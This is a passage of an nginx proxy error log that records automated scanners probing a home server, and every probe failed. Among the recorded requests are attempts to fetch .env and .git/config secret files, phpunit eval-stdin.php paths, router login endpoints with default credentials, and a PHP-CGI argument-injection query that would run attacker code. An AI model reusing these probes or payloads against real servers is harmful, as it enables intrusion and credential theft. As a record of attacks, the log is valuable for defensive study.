server: localhost-nginx-proxy-manager, request: "GET /db.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:08 [error] 357#357: *36719 open() "/var/www/html/packed.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /packed.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:08 [error] 357#357: *36719 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:08 [error] 357#357: *36719 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:08 [error] 357#357: *36719 open() "/var/www/html/des.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /des.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:08 [error] 357#357: *36719 open() "/var/www/html/.well-known/content.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /.well-known/content.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:08 [error] 357#357: *36719 open() "/var/www/html/lufix.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //lufix.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 09:32:09 [error] 357#357: *36971 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.66, server: localhost-nginx-proxy-manager, request: "HEAD /_next HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 09:32:12 [error] 357#357: *36973 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.66, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 09:41:56 [error] 358#358: *37003 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 45.148.10.124, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/29 09:42:05 [error] 358#358: *37005 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 45.148.10.124, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/29 10:05:59 [error] 358#358: *37067 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 11:01:36 [error] 365#365: *37355 open() "/var/www/html/wp-json/wc/v3" failed (2: No such file or directory), client: 156.146.135.21, server: localhost-nginx-proxy-manager, request: "GET /wp-json/wc/v3 HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 11:01:36 [error] 365#365: *37355 open() "/var/www/html/magento_version" failed (2: No such file or directory), client: 156.146.135.21, server: localhost-nginx-proxy-manager, request: "GET /magento_version HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 11:01:36 [error] 365#365: *37355 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 156.146.135.21, server: localhost-nginx-proxy-manager, request: "GET /index.php?route=checkout/cart HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 11:01:36 [error] 365#365: *37355 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 156.146.135.21, server: localhost-nginx-proxy-manager, request: "GET /index.php?route=account/register HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 11:01:36 [error] 365#365: *37355 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 156.146.135.21, server: localhost-nginx-proxy-manager, request: "GET /index.php?route=account/login HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 11:01:37 [error] 365#365: *37355 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 156.146.135.21, server: localhost-nginx-proxy-manager, request: "GET /index.php?route=checkout/checkout HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 11:01:37 [error] 365#365: *37355 "/var/www/html/admin/index.html" is not found (2: No such file or directory), client: 156.146.135.21, server: localhost-nginx-proxy-manager, request: "GET /admin/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 11:01:37 [error] 365#365: *37355 "/var/www/html/wp-json/index.html" is not found (2: No such file or directory), client: 156.146.135.21, server: localhost-nginx-proxy-manager, request: "GET /wp-json/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 11:39:12 [error] 363#363: *37452 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 11:49:10 [error] 363#363: *37483 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37484 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37485 open() "/var/www/html/sqlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37486 open() "/var/www/html/sqlitemanager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlitemanager/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37487 open() "/var/www/html/SQLiteManager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37488 open() "/var/www/html/SQLite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37489 open() "/var/www/html/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37490 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37491 open() "/var/www/html/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37492 open() "/var/www/html/SQLiteManager-1.2.4/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager-1.2.4/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 11:49:10 [error] 363#363: *37493 open() "/var/www/html/agSearch/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /agSearch/SQlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/29 12:05:11 [error] 364#364: *37654 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 12:11:55 [error] 364#364: *37729 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 12:25:49 [error] 364#364: *37783 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 12:44:27 [error] 363#363: *39375 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 123.6.49.6, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/29 12:44:30 [error] 363#363: *39376 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 123.6.49.42, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/29 12:44:32 [error] 363#363: *39378 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 123.6.49.38, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/29 13:03:02 [error] 366#366: *41069 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 1.192.195.5, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/29 13:03:03 [error] 366#366: *41070 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 1.192.195.11, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/29 13:03:04 [error] 366#366: *41071 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 1.192.195.8, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/29 13:13:49 [error] 366#366: *41172 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 13:24:32 [error] 363#363: *41224 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 14:00:55 [error] 363#363: *41413 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 14:02:23 [error] 364#364: *41421 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 104.248.207.191, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "91.82.215.191" +2026/01/29 14:02:23 [error] 364#364: *41422 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 104.248.207.191, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "91.82.215.191" +2026/01/29 14:02:24 [error] 364#364: *41423 open() "/var/www/html/t4" failed (2: No such file or directory), client: 104.248.207.191, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "91.82.215.191" +2026/01/29 14:02:24 [error] 364#364: *41424 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 104.248.207.191, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "91.82.215.191" +2026/01/29 14:02:24 [error] 366#366: *42912 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 104.248.207.191, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91.82.215.191" +2026/01/29 14:02:24 [error] 366#366: *42913 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 104.248.207.191, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "91.82.215.191" +2026/01/29 14:02:25 [error] 366#366: *42914 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 104.248.207.191, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "91.82.215.191" +2026/01/29 14:29:38 [error] 363#363: *43049 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 14:31:37 [error] 363#363: *43055 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 182.116.34.153, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" +2026/01/29 14:49:24 [error] 363#363: *43107 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 14:54:16 [error] 364#364: *43121 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 14:57:20 [error] 364#364: *43131 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 15:17:21 [error] 364#364: *43229 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 15:54:52 [error] 364#364: *43339 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "91.82.215.191" +2026/01/29 16:09:28 [error] 364#364: *43344 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 16:27:37 [error] 365#365: *43347 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 17:15:12 [error] 370#370: *43362 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 17:48:56 [error] 370#370: *43369 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:17:06 [error] 370#370: *43381 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:31:09 [error] 370#370: *43398 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:09 [error] 371#371: *43399 open() "/var/www/html/stage/.env.bak" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /stage/.env.bak HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:10 [error] 371#371: *43400 open() "/var/www/html/tmp/.env.token" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /tmp/.env.token HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:10 [error] 371#371: *43401 open() "/var/www/html/test/.env.conf" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /test/.env.conf HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:10 [error] 371#371: *43402 open() "/var/www/html/users/.env.bak" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /users/.env.bak HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:10 [error] 371#371: *43403 open() "/var/www/html/users/.env.dev" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /users/.env.dev HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:10 [error] 371#371: *43404 open() "/var/www/html/utilities/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /utilities/.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:11 [error] 371#371: *43405 open() "/var/www/html/prod/.env.dist" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /prod/.env.dist HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:11 [error] 371#371: *43406 open() "/var/www/html/terraform/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /terraform/.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:11 [error] 371#371: *43407 open() "/var/www/html/staging/.env.2" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /staging/.env.2 HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:11 [error] 371#371: *43408 open() "/var/www/html/printenv.shtml" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /printenv.shtml HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:12 [error] 371#371: *43409 open() "/var/www/html/symfony/env.py" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /symfony/env.py HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:12 [error] 371#371: *43410 open() "/var/www/html/staging/.env.1" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /staging/.env.1 HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:12 [error] 371#371: *43411 open() "/var/www/html/var/.env.local" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /var/.env.local HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:12 [error] 371#371: *43412 open() "/var/www/html/stg/config.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /stg/config.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:12 [error] 371#371: *43413 open() "/var/www/html/stg/.env.local" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /stg/.env.local HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:12 [error] 371#371: *43414 open() "/var/www/html/tmp/.env.local" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /tmp/.env.local HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:13 [error] 372#372: *43415 open() "/var/www/html/src/config.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /src/config.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:13 [error] 372#372: *43416 open() "/var/www/html/variables/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /variables/.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:13 [error] 372#372: *43417 open() "/var/www/html/src/env/env.ts" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /src/env/env.ts HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:14 [error] 372#372: *43418 open() "/var/www/html/src/.env.local" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /src/.env.local HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:14 [error] 372#372: *43419 open() "/var/www/html/sicherung/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /sicherung/.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:14 [error] 372#372: *43420 open() "/var/www/html/wordpress/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /wordpress/.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:14 [error] 372#372: *43421 open() "/var/www/html/workspace/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /workspace/.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:14 [error] 372#372: *43422 open() "/var/www/html/panel/.env.uat" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /panel/.env.uat HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:14 [error] 372#372: *43424 open() "/var/www/html/panel/.env.tmp" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /panel/.env.tmp HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:15 [error] 372#372: *43425 open() "/var/www/html/panel/.env.pem" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /panel/.env.pem HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:15 [error] 372#372: *43426 open() "/var/www/html/panel/.env.old" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /panel/.env.old HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:15 [error] 372#372: *43427 open() "/var/www/html/panel/.env.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /panel/.env.log HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:15 [error] 372#372: *43428 open() "/var/www/html/panel/.env.key" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /panel/.env.key HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:31:16 [error] 372#372: *43429 open() "/var/www/html/panel/.env.gcp" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /panel/.env.gcp HTTP/1.1", host: "91.82.215.191" +2026/01/29 18:54:41 [error] 373#373: *43469 open() "/var/www/html/mifs/c/windows/api/v2/device/registration" failed (2: No such file or directory), client: 134.209.174.8, server: localhost-nginx-proxy-manager, request: "GET /mifs/c/windows/api/v2/device/registration HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:54:44 [error] 373#373: *43470 open() "/var/www/html/mifs/rs/api/v2/device/registration" failed (2: No such file or directory), client: 134.209.174.8, server: localhost-nginx-proxy-manager, request: "GET /mifs/rs/api/v2/device/registration HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:56 [error] 373#373: *43473 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:56 [error] 373#373: *43473 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:56 [error] 373#373: *43473 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:56 [error] 373#373: *43473 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:57 [error] 373#373: *43473 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:57 [error] 373#373: *43473 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:57 [error] 373#373: *43473 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:57 [error] 373#373: *43473 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:57 [error] 373#373: *43473 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:58 [error] 373#373: *43473 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:58 [error] 373#373: *43473 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:58 [error] 373#373: *43473 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:58 [error] 373#373: *43473 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:58 [error] 373#373: *43473 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:57:59 [error] 373#373: *43473 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:00 [error] 373#373: *43473 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:01 [error] 373#373: *43473 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:01 [error] 373#373: *43473 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:01 [error] 373#373: *43473 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:02 [error] 373#373: *43473 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:07 [error] 373#373: *43473 open() 